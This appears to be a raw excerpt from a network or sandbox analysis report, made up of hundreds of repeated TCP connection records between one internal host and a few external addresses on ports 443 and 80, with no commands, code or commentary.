                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
